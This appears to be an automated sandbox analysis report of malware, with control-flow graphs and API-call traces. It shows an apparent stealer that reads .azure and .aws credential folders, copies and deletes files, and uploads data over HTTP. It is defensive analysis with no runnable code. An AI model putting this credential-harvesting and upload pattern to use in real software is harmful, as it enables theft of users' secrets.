                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                      • String ID: ------$"$"$"$--$------$------$------
                                                                                                                                                      • API String ID: 2335077847-2774362122
                                                                                                                                                      • Opcode ID: 8a401498662898a64268dd117ac59c6aec5ca00b8bedd310813ea3559af7915b
                                                                                                                                                      • Instruction ID: 81ae411a62e48fe24c91fea12507c70efeaea2431966101f11318cab47146391
                                                                                                                                                      • Opcode Fuzzy Hash: 8a401498662898a64268dd117ac59c6aec5ca00b8bedd310813ea3559af7915b
                                                                                                                                                      • Instruction Fuzzy Hash: 54320071D20219AADB16EBA4DC9DFFEB379BF54700F504169E90672090DF706A49CFA0

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1323 2755960-2755a1b call 276a7a0 call 27547b0 call 276a740 * 5 InternetOpenA StrCmpCA 1338 2755a24-2755a28 1323->1338 1339 2755a1d 1323->1339 1340 2755fc3-2755feb InternetCloseHandle call 276aad0 call 2759ac0 1338->1340 1341 2755a2e-2755ba6 call 2768b60 call 276a920 call 276a8a0 call 276a800 * 2 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a920 call 276a8a0 call 276a800 * 2 InternetConnectA 1338->1341 1339->1338 1350 2755fed-2756025 call 276a820 call 276a9b0 call 276a8a0 call 276a800 1340->1350 1351 275602a-2756095 call 2768990 * 2 call 276a7a0 call 276a800 * 5 call 2751550 call 276a800 1340->1351 1341->1340 1425 2755bac-2755bba 1341->1425 1350->1351 1426 2755bbc-2755bc6 1425->1426 1427 2755bc8 1425->1427 1428 2755bd2-2755c05 HttpOpenRequestA 1426->1428 1427->1428 1429 2755fb6-2755fbd InternetCloseHandle 1428->1429 1430 2755c0b-2755f2f call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276aad0 lstrlen call 276aad0 lstrlen GetProcessHeap RtlAllocateHeap call 276aad0 lstrlen call 276aad0 memcpy call 276aad0 lstrlen call 276aad0 * 2 lstrlen memcpy call 276aad0 lstrlen call 276aad0 HttpSendRequestA 1428->1430 1429->1340 1539 2755f35-2755f5f InternetReadFile 1430->1539 1540 2755f61-2755f68 1539->1540 1541 2755f6a-2755fb0 InternetCloseHandle 1539->1541 1540->1541 1542 2755f6c-2755faa call 276a9b0 call 276a8a0 call 276a800 1540->1542 1541->1429 1542->1539
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 027547EA
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754801
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754818
                                                                                                                                                        • Part of subcall function 027547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02754839
                                                                                                                                                        • Part of subcall function 027547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 02754849
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 027559F8
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,029E4B88), ref: 02755A13
                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02755B93
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,029E4BD8,00000000,?,029D98C8,00000000,?,02771A1C), ref: 02755E71
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02755E82
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 02755E93
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02755E9A
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02755EAF
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 02755EC6
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02755ED8
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02755EF1
                                                                                                                                                      • memcpy.MSVCRT(?), ref: 02755EFE
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 02755F1B
                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02755F2F
                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02755F4C
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02755FB0
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02755FBD
                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,029E4CC8,?,029E5F38,00000000,00000000,00400100,00000000), ref: 02755BF8
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02755FC7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                                                                                                                      • String ID: "$"$------$------$------
                                                                                                                                                      • API String ID: 1703137719-2180234286
                                                                                                                                                      • Opcode ID: 13a4cd9ff11b436a08b9ca45e4bcf78310e0de6028a370a0e4187b6e3b426365
                                                                                                                                                      • Instruction ID: 6250b0a27cbc6131615da4f9afed94e9e0dbfb700446a3a56d95ec75da3629d8
                                                                                                                                                      • Opcode Fuzzy Hash: 13a4cd9ff11b436a08b9ca45e4bcf78310e0de6028a370a0e4187b6e3b426365
                                                                                                                                                      • Instruction Fuzzy Hash: F212C071820119ABDB16EBA4DC9DFFEB379FF14700F5045A9A90672090EF706A49CFA4

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1550 275a790-275a7ac call 276aa70 1553 275a7bd-275a7d1 call 276aa70 1550->1553 1554 275a7ae-275a7bb call 276a820 1550->1554 1560 275a7d3-275a7e0 call 276a820 1553->1560 1561 275a7e2-275a7f6 call 276aa70 1553->1561 1559 275a81d-275a88e call 276a740 call 276a9b0 call 276a8a0 call 276a800 call 2768b60 call 276a920 call 276a8a0 call 276a800 * 2 1554->1559 1593 275a893-275a89a 1559->1593 1560->1559 1561->1559 1568 275a7f8-275a818 call 276a800 * 3 call 2751550 1561->1568 1587 275aedd-275aee0 1568->1587 1594 275a8d6-275a8ea call 276a740 1593->1594 1595 275a89c-275a8b8 call 276aad0 * 2 CopyFileA 1593->1595 1601 275a997-275aa7a call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a9b0 call 276a8a0 call 276a800 * 2 1594->1601 1602 275a8f0-275a992 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 1594->1602 1606 275a8d2 1595->1606 1607 275a8ba-275a8d4 call 276a7a0 call 27694d0 1595->1607 1659 275aa7f-275aa97 call 276aad0 1601->1659 1602->1659 1606->1594 1607->1593 1669 275aa9d-275aabb 1659->1669 1670 275ae8e-275aea0 call 276aad0 DeleteFileA call 276aa40 1659->1670 1676 275ae74-275ae84 1669->1676 1677 275aac1-275aad5 GetProcessHeap RtlAllocateHeap 1669->1677 1681 275aea5-275aed8 call 276aa40 call 276a800 * 5 call 2751550 1670->1681 1686 275ae8b 1676->1686 1680 275aad8-275aae8 1677->1680 1687 275aaee-275abea call 276a740 * 6 call 276a7a0 call 2751590 call 2759e10 call 276aad0 StrCmpCA 1680->1687 1688 275ae09-275ae16 lstrlen 1680->1688 1681->1587 1686->1670 1737 275abec-275ac54 call 276a800 * 12 call 2751550 1687->1737 1738 275ac59-275ac6b call 276aa70 1687->1738 1690 275ae63-275ae71 memset 1688->1690 1691 275ae18-275ae4d lstrlen call 276a7a0 call 2751590 call 2765190 1688->1691 1690->1676 1709 275ae52-275ae5e call 276a800 1691->1709 1709->1690 1737->1587 1743 275ac7d-275ac87 call 276a820 1738->1743 1744 275ac6d-275ac7b call 276a820 1738->1744 1750 275ac8c-275ac9e call 276aa70 1743->1750 1744->1750 1757 275acb0-275acba call 276a820 1750->1757 1758 275aca0-275acae call 276a820 1750->1758 1764 275acbf-275accf call 276aab0 1757->1764 1758->1764 1770 275acd1-275acd9 call 276a820 1764->1770 1771 275acde-275ae04 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276a800 * 7 1764->1771 1770->1771 1771->1680
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276AA70: StrCmpCA.SHLWAPI(00000000,02771470,0275D1A2,02771470,00000000), ref: 0276AA8F
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0275AAC8
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0275AACF
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0275ABE2
                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0275A8B0
                                                                                                                                                        • Part of subcall function 0276A820: lstrlen.KERNEL32(00000000,?,?,02765B54,02770ADB,02770ADA,?,?,02766B16,00000000,?,029D0578,?,0277110C,?,00000000), ref: 0276A82B
                                                                                                                                                        • Part of subcall function 0276A820: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A885
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275ACEB
                                                                                                                                                      • lstrcat.KERNEL32(?,02771320), ref: 0275ACFA
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275AD0D
                                                                                                                                                      • lstrcat.KERNEL32(?,02771324), ref: 0275AD1C
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275AD2F
                                                                                                                                                      • lstrcat.KERNEL32(?,02771328), ref: 0275AD3E
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275AD51
                                                                                                                                                      • lstrcat.KERNEL32(?,0277132C), ref: 0275AD60
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275AD73
                                                                                                                                                      • lstrcat.KERNEL32(?,02771330), ref: 0275AD82
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275AD95
                                                                                                                                                      • lstrcat.KERNEL32(?,02771334), ref: 0275ADA4
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275ADB7
                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0275AE0D
                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0275AE1C
                                                                                                                                                      • memset.MSVCRT ref: 0275AE6B
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 02759E10: memcmp.MSVCRT(?,v20,00000003), ref: 02759E2D
                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0275AE97
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemcmpmemset
                                                                                                                                                      • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                      • API String ID: 4068497927-2709115261
                                                                                                                                                      • Opcode ID: 04b8111e6ac69b024fadcb7c98976fd757f28a65bcead49e04a77c502f4847c1
                                                                                                                                                      • Instruction ID: dbf631b335e11d01ae303abf222e2b5991540114b1912f44136a4e1285bdddd4
                                                                                                                                                      • Opcode Fuzzy Hash: 04b8111e6ac69b024fadcb7c98976fd757f28a65bcead49e04a77c502f4847c1
                                                                                                                                                      • Instruction Fuzzy Hash: 1C122D719101099BDB06FBA4DD9EEFE7379AF14301F504569A907B6090EF35AE09CFA0

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2205 275cef0-275d096 call 276a740 call 276a9b0 call 276a8a0 call 276a800 call 2768b60 call 276a920 call 276a8a0 call 276a800 * 2 call 276aad0 * 2 CopyFileA call 276a740 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a9b0 call 276a8a0 call 276a800 * 2 call 276aad0 2267 275d09c-275d0ba 2205->2267 2268 275d3ab-275d3bd call 276aad0 DeleteFileA call 276aa40 2205->2268 2273 275d391-275d3a1 2267->2273 2274 275d0c0-275d0d4 GetProcessHeap RtlAllocateHeap 2267->2274 2275 275d3c2-275d3fd call 276aa40 call 276a800 * 5 call 2751550 2268->2275 2284 275d3a8 2273->2284 2276 275d0d7-275d0da 2274->2276 2280 275d0e1-275d0e7 2276->2280 2282 275d326-275d333 lstrlen 2280->2282 2283 275d0ed-275d1a7 call 276a740 * 7 call 276aa70 2280->2283 2285 275d335-275d37b lstrlen call 276a7a0 call 2751590 call 2765190 call 276a800 2282->2285 2286 275d380-275d38e memset 2282->2286 2328 275d1b9-275d1c3 call 276a820 2283->2328 2329 275d1a9-275d1b7 call 276a820 2283->2329 2284->2268 2285->2286 2286->2273 2333 275d1c8-275d1da call 276aa70 2328->2333 2329->2333 2336 275d1ec-275d1f6 call 276a820 2333->2336 2337 275d1dc-275d1ea call 276a820 2333->2337 2340 275d1fb-275d321 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276aad0 lstrcat * 2 call 276a800 * 7 2336->2340 2337->2340 2340->2276
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 02768B60: GetSystemTime.KERNEL32(?,029D9928,027705AE,?,?,?,?,?,?,?,?,?,02754963,?,00000014), ref: 02768B86
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0275CF83
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0275D0C7
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0275D0CE
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275D208
                                                                                                                                                      • lstrcat.KERNEL32(?,02771478), ref: 0275D217
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275D22A
                                                                                                                                                      • lstrcat.KERNEL32(?,0277147C), ref: 0275D239
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275D24C
                                                                                                                                                      • lstrcat.KERNEL32(?,02771480), ref: 0275D25B
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275D26E
                                                                                                                                                      • lstrcat.KERNEL32(?,02771484), ref: 0275D27D
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275D290
                                                                                                                                                      • lstrcat.KERNEL32(?,02771488), ref: 0275D29F
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275D2B2
                                                                                                                                                      • lstrcat.KERNEL32(?,0277148C), ref: 0275D2C1
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275D2D4
                                                                                                                                                      • lstrcat.KERNEL32(?,02771490), ref: 0275D2E3
                                                                                                                                                        • Part of subcall function 0276A820: lstrlen.KERNEL32(00000000,?,?,02765B54,02770ADB,02770ADA,?,?,02766B16,00000000,?,029D0578,?,0277110C,?,00000000), ref: 0276A82B
                                                                                                                                                        • Part of subcall function 0276A820: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A885
                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0275D32A
                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0275D339
                                                                                                                                                      • memset.MSVCRT ref: 0275D388
                                                                                                                                                        • Part of subcall function 0276AA70: StrCmpCA.SHLWAPI(00000000,02771470,0275D1A2,02771470,00000000), ref: 0276AA8F
                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0275D3B4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1973479514-0
                                                                                                                                                      • Opcode ID: 63f6cc1479c924fd71d2f4c31706237af93239c4a53ed880eb17c39067fd15f6
                                                                                                                                                      • Instruction ID: 3bce92ac062034c8e9b6f8e599c5c942c95225fc58168f76845cc9a519b2a498
                                                                                                                                                      • Opcode Fuzzy Hash: 63f6cc1479c924fd71d2f4c31706237af93239c4a53ed880eb17c39067fd15f6
                                                                                                                                                      • Instruction Fuzzy Hash: 97E13A72950109ABDB06EBA4DD9DEFE7379EF14301F104568E907B6090DE35AE1ACFA0
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 02764D87
                                                                                                                                                        • Part of subcall function 02768DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 02768E0B
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 02764DB0
                                                                                                                                                      • lstrcat.KERNEL32(?,\.azure\), ref: 02764DCD
                                                                                                                                                        • Part of subcall function 02764910: wsprintfA.USER32 ref: 0276492C
                                                                                                                                                        • Part of subcall function 02764910: FindFirstFileA.KERNEL32(?,?), ref: 02764943
                                                                                                                                                      • memset.MSVCRT ref: 02764E13
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 02764E3C
                                                                                                                                                      • lstrcat.KERNEL32(?,\.aws\), ref: 02764E59
                                                                                                                                                        • Part of subcall function 02764910: StrCmpCA.SHLWAPI(?,02770FDC), ref: 02764971
                                                                                                                                                        • Part of subcall function 02764910: StrCmpCA.SHLWAPI(?,02770FE0), ref: 02764987
                                                                                                                                                        • Part of subcall function 02764910: FindNextFileA.KERNEL32(000000FF,?), ref: 02764B7D
                                                                                                                                                        • Part of subcall function 02764910: FindClose.KERNEL32(000000FF), ref: 02764B92
                                                                                                                                                      • memset.MSVCRT ref: 02764E9F
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 02764EC8
